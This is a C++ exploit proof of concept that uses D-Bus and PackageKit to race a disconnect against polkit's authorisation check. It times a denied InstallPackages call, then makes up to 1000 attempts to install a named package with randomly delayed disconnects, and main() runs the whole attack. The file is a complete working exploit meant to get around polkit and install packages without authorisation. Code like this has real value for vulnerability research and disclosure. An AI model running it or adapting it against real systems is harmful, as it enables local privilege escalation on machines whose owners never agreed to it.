#include "dbus_utils.hpp"
#include "dbus_auth.hpp"
#include "parse.hpp"
#include "utils.hpp"
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <crypt.h>
#include <errno.h>
#include <spawn.h>
#include <signal.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <cstdint>
#include <functional>
#include <memory>
#include <random>
#include <utility>
#include <assert.h>

// A D-Bus connection over a Unix-domain stream socket. The constructor
// creates and connects the socket, runs the authentication step
// (dbus_sendauth) and the Hello() exchange, so a fully constructed object
// is ready for method calls. The descriptor is owned by the AutoCloseFD
// base; destroying the object closes it, which disconnects from the bus.
class DBusSocket : public AutoCloseFD {
public:
  // uid:      user id passed to dbus_sendauth for authentication.
  // filename: path of the bus socket, e.g. /var/run/dbus/system_bus_socket.
  // Throws ErrorWithErrno if socket()/connect() fails, or if `filename` does
  // not fit in sockaddr_un::sun_path (errno is set to ENAMETOOLONG first,
  // presumably so ErrorWithErrno reports it — confirm).
  DBusSocket(const uid_t uid, const char* filename) :
    AutoCloseFD(socket(AF_UNIX, SOCK_STREAM, 0))
  {
    if (get() < 0) {
      throw ErrorWithErrno("Could not create socket");
    }

    sockaddr_un address;
    memset(&address, 0, sizeof(address));
    address.sun_family = AF_UNIX;

    // sun_path is a small fixed-size array; an unchecked strcpy of a long
    // path would overflow it. Require room for the terminating NUL.
    if (strlen(filename) >= sizeof(address.sun_path)) {
      errno = ENAMETOOLONG;
      throw ErrorWithErrno("Socket path is too long");
    }
    strcpy(address.sun_path, filename);

    if (connect(get(), (sockaddr*)(&address), sizeof(address)) < 0) {
      throw ErrorWithErrno("Could not connect socket");
    }

    dbus_sendauth(uid, get());

    // Complete the Hello() exchange. The first body element of the reply is
    // read as a string (presumably this connection's unique bus name); it is
    // not otherwise used here.
    dbus_send_hello(get());
    std::unique_ptr<DBusMessage> hello_reply1 = receive_dbus_message(get());
    std::string name = hello_reply1->getBody().getElement(0)->toString().getValue();
    // A second message follows the Hello() reply (presumably the bus's
    // NameAcquired signal — confirm). Read and discard it so later
    // receive_dbus_message calls start after it.
    std::unique_ptr<DBusMessage> hello_reply2 = receive_dbus_message(get());
  }
};

// Calls org.freedesktop.DBus.AddMatch so that signals sent by
// org.freedesktop.PackageKit from object path `objectpath` with member name
// `member` are routed to this connection.
//
// Blocks until the next message arrives on `fd` and throws Error unless it
// is a method return.
// NOTE(review): assumes that next message is the reply to this call.
static void send_AddMatch(
  const int fd,
  const char* objectpath,
  const char* member,
  const uint32_t serialNumber
) {
  auto match_rule =
    _s("type='signal',sender='org.freedesktop.PackageKit',") +
    _s("path='") + _s(objectpath) +
    _s("',member='") + _s(member) + "'";

  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk1(DBusObjectString::mk(std::move(match_rule))),
    _s("/org/freedesktop/DBus"),
    _s("org.freedesktop.DBus"),
    _s("org.freedesktop.DBus"),
    _s("AddMatch")
  );

  const std::unique_ptr<DBusMessage> answer = receive_dbus_message(fd);
  const bool accepted = answer->getHeader_messageType() == MSGTYPE_METHOD_RETURN;
  if (!accepted) {
    throw Error("AddMatch returned an error.");
  }
}

static std::string send_PackageKit_CreateTransaction(
  const int fd,
  const uint32_t serialNumber
) {
  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk0(),
    _s("/org/freedesktop/PackageKit"),
    _s("org.freedesktop.PackageKit"),
    _s("org.freedesktop.PackageKit"),
    _s("CreateTransaction")
  );

  std::unique_ptr<DBusMessage> reply = receive_dbus_message(fd);

  if (reply->getHeader_messageType() != MSGTYPE_METHOD_RETURN) {
    throw Error("FindUserByName returned an error.");
  }

  return reply->getBody().getElement(0)->toPath().getValue();
}

// Sends org.freedesktop.PackageKit.Transaction.InstallPackages to the
// transaction object at `objectpath`. The arguments are a uint64 flags value
// of 0x2 and a one-element string array containing `packagename`. Callers in
// this file pass a full package_id here, not a bare name.
//
// The reply is NOT read here; the caller decides whether to wait for it.
void send_PackageKit_InstallPackage(
  const int fd,
  const char* objectpath,
  const char* packagename,
  const uint32_t serialNumber
) {
  // NOTE(review): presumably the PackageKit transaction-flags bitfield
  // (1 << 1, ONLY_TRUSTED) — confirm against PackageKit's pk-enum.h.
  const uint64_t transaction_flags = 0x2;

  auto package_list = _vec<std::unique_ptr<DBusObject>>(
    DBusObjectString::mk(_s(packagename))
  );
  auto call_args = _vec<std::unique_ptr<DBusObject>>(
    DBusObjectUint64::mk(transaction_flags),
    DBusObjectArray::mk1(std::move(package_list))
  );

  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk(std::move(call_args)),
    _s(objectpath),
    _s("org.freedesktop.PackageKit.Transaction"),
    _s("org.freedesktop.PackageKit"),
    _s("InstallPackages")
  );
}

// Sends org.freedesktop.PackageKit.Transaction.SearchNames to the transaction
// object at `objectpath`. The arguments are a uint64 filter value of 0
// (presumably "no filter" — confirm) and a one-element string array holding
// `packagename`.
//
// Results arrive later as signals on the transaction object, so nothing is
// read from `fd` here.
static void send_PackageKit_SearchName(
  const int fd,
  const char* objectpath,
  const char* packagename,
  const uint32_t serialNumber
) {
  auto search_terms = _vec<std::unique_ptr<DBusObject>>(
    DBusObjectString::mk(_s(packagename))
  );
  auto call_args = _vec<std::unique_ptr<DBusObject>>(
    DBusObjectUint64::mk(0),
    DBusObjectArray::mk1(std::move(search_terms))
  );

  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk(std::move(call_args)),
    _s(objectpath),
    _s("org.freedesktop.PackageKit.Transaction"),
    _s("org.freedesktop.PackageKit"),
    _s("SearchNames")
  );
}

// Most of the PackageKit methods take a "package_id" as an argument. This
// is an example of a package_id:
//
//   bash;5.1-2ubuntu1;amd64;installed:ubuntu-hirsute-main
//
// This function calls the "SearchNames" method to find the correct
// package_id for the package that we want to install. SearchNames is a bit
// annoying to use because its results arrive as signals rather than in the
// method's reply. So we use "AddMatch" to subscribe to the transaction's
// "Package" and "Finished" signals.
//
// uid:             user id used for D-Bus authentication.
// socket_filename: path of the D-Bus socket.
// packagename:     exact package name; a package_id matches when it starts
//                  with `packagename` immediately followed by ';'.
// is_installed:    out parameter. Reset to false, then set to true if the
//                  matching Package signal's first element is 1 (presumably
//                  PackageKit's "installed" info value — confirm).
// Returns the first matching package_id. Throws Error if the "Finished"
// signal arrives before a match, or on any unexpected message/signal.
static std::string lookup_package_id(
  const uid_t uid,
  const char* socket_filename,
  const char* packagename,
  bool* is_installed // out parameter
) {
  DBusSocket fd(uid, socket_filename);

  *is_installed = false;

  std::string transaction_id =
    send_PackageKit_CreateTransaction(fd.get(), 1001);
  printf("lookup_package_id: transaction_id = %s\n", transaction_id.c_str());

  // Add listeners for the "Package" and "Finished" signals. Every call on
  // this connection gets its own serial number so the replies are
  // distinguishable (both AddMatch calls previously shared 1002).
  send_AddMatch(fd.get(), transaction_id.c_str(), "Package", 1002);
  send_AddMatch(fd.get(), transaction_id.c_str(), "Finished", 1003);

  // Call the method.
  send_PackageKit_SearchName(fd.get(), transaction_id.c_str(), packagename, 1004);

  // A package_id is "name;version;arch;data", so a match on the name is a
  // prefix match on "name;".
  const std::string wanted_prefix = std::string(packagename) + ';';

  // Loop until we receive a matching "Package" signal or the "Finished" signal.
  while (true) {
    std::unique_ptr<DBusMessage> signal = receive_dbus_message(fd.get());

    if (signal->getHeader_messageType() == MSGTYPE_METHOD_RETURN) {
      // Ignore. The SearchNames method sends a reply containing no
      // useful information.
    } else if (signal->getHeader_messageType() == MSGTYPE_SIGNAL) {
      // Copy into std::string instead of keeping a c_str() pointer, so the
      // text stays valid whether the accessors return references or
      // temporaries.
      const std::string member =
        signal->getHeader_lookupField(MSGHDR_MEMBER).getValue()->toString().getValue();
      if (member == "Package") {
        const std::string package_id =
          signal->getBody().getElement(1)->toString().getValue();
        printf("package_id: %s\n", package_id.c_str());
        if (package_id.compare(0, wanted_prefix.size(), wanted_prefix) == 0) {
          uint32_t info = signal->getBody().getElement(0)->toUint32().getValue();
          if (info == 1) {
            *is_installed = true;
          }
          return package_id;
        }
      } else if (member == "Finished") {
        throw Error("lookup_package_id failed: package not found");
      } else {
        throw Error("lookup_package_id failed: unexpected signal type");
      }
    } else {
      throw Error("lookup_package_id failed: unexpected message type");
    }
  }
}

// Measures how long the InstallPackages method takes to produce a response.
// The response is expected to be an error because polkit denies the request.
// This response time gives an upper bound on how long we need to wait before
// disconnecting when we attempt to trigger the bug.
//
// Opens its own D-Bus connection and transaction. Returns the time elapsed
// on CLOCK_MONOTONIC between sending InstallPackages and receiving the next
// message, in nanoseconds. The contents of that message are not inspected.
static long record_time_InstallPackage(
  const uid_t uid,
  const char* socket_filename,
  const char* package_id
) {
  DBusSocket fd(uid, socket_filename);

  const std::string transaction_id =
    send_PackageKit_CreateTransaction(fd.get(), 1001);
  printf("record_time_InstallPackage: transaction_id = %s\n", transaction_id.c_str());

  timespec before;
  timespec after;

  clock_gettime(CLOCK_MONOTONIC, &before);
  send_PackageKit_InstallPackage(fd.get(), transaction_id.c_str(), package_id, 1003);
  const std::unique_ptr<DBusMessage> response = receive_dbus_message(fd.get());
  clock_gettime(CLOCK_MONOTONIC, &after);

  const auto whole_seconds = after.tv_sec - before.tv_sec;
  const auto extra_nanos = after.tv_nsec - before.tv_nsec;
  return (1000000000 * whole_seconds) + extra_nanos;
}

// Calls the InstallPackages method without waiting for its reply, then
// sleeps for `delay` nanoseconds on CLOCK_MONOTONIC and returns. Returning
// destroys the DBusSocket, whose AutoCloseFD base closes the descriptor and
// so disconnects from D-Bus. If the timing of the delay is right, this may
// trigger the bug and bypass polkit.
//
// The return value of clock_nanosleep is ignored, so a signal that interrupts
// the sleep shortens the delay.
static void attempt_InstallPackage_with_disconnect(
  const uid_t uid,
  const char* socket_filename,
  const char* package_id,
  const long delay
) {
  DBusSocket fd(uid, socket_filename);

  const std::string transaction_id =
    send_PackageKit_CreateTransaction(fd.get(), 1001);
  printf("attempt_InstallPackage_with_disconnect: transaction_id = %s\n", transaction_id.c_str());

  // Convert the nanosecond count into the seconds + nanoseconds form that
  // clock_nanosleep expects.
  const long nanos_per_second = 1000000000;
  timespec pause;
  pause.tv_sec = delay / nanos_per_second;
  pause.tv_nsec = delay % nanos_per_second;

  send_PackageKit_InstallPackage(fd.get(), transaction_id.c_str(), package_id, 1003);
  clock_nanosleep(CLOCK_MONOTONIC, 0, &pause, nullptr);
}

// Keep trying `attempt_InstallPackage_with_disconnect` with different
// delay values until the exploit succeeds (or we decide to give up).
//
// Steps:
//  1. Look up the package_id for `packagename`. If the package is already
//     installed, print a message and return.
//  2. Measure the normal response time of InstallPackages.
//  3. Make up to 1000 attempts, each with a random delay drawn uniformly from
//     [0, 2*elapsed] nanoseconds. After each attempt, look the package up
//     again and return once it reports as installed.
// Throws Error if no attempt succeeds. Errors thrown by the D-Bus helpers
// propagate to the caller.
static void exploit_InstallPackage(
  const uid_t uid,
  const char* socket_filename,
  const char* packagename
) {
  bool already_installed = false;
  const std::string package_id =
    lookup_package_id(uid, socket_filename, packagename, &already_installed);
  if (already_installed) {
    printf("Package %s is already installed.\n", packagename);
    return;
  }

  // First measure how long a regular InstallPackages method call takes.
  const long elapsed =
    record_time_InstallPackage(uid, socket_filename, package_id.c_str());
  printf("Elapsed time: %ld nanoseconds\n", elapsed);

  // Random number generator which will generate random
  // pause times in the range 0 .. 2*elapsed.
  std::random_device rd;
  std::mt19937 gen(rd());
  std::uniform_int_distribution<long> distrib(0, 2*elapsed);

  // If it doesn't succeed after 1000 attempts then it probably
  // isn't going to work.
  for (size_t attempt = 0; attempt < 1000; attempt++) {
    const long delay = distrib(gen);
    attempt_InstallPackage_with_disconnect(uid, socket_filename, package_id.c_str(), delay);

    // Check if the package has been installed. A separate variable name is
    // used so the outer `already_installed` is not shadowed.
    bool now_installed = false;
    lookup_package_id(uid, socket_filename, packagename, &now_installed);
    if (now_installed) {
      printf("Success!\n");
      return;
    }
  }

  throw Error("Failed to install package.");
}

// Entry point. Expects exactly two arguments: the path of the D-Bus Unix
// socket and the name of the package to install. With any other argument
// count, prints usage to stderr and returns EXIT_FAILURE. Otherwise runs
// exploit_InstallPackage as the current real user id and returns
// EXIT_SUCCESS if it returns normally.
int main(int argc, char* argv[]) {
  const char* const progname = (argc > 0) ? argv[0] : "a.out";

  if (argc == 3) {
    const uid_t my_uid = getuid();
    const char* const bus_socket_path = argv[1];
    const char* const target_package = argv[2];

    exploit_InstallPackage(my_uid, bus_socket_path, target_package);
    return EXIT_SUCCESS;
  }

  fprintf(
    stderr,
    "usage:   %s <unix socket path> <package name>\n"
    "example: %s /var/run/dbus/system_bus_socket gnome-control-center\n",
    progname,
    progname
  );
  return EXIT_FAILURE;
}
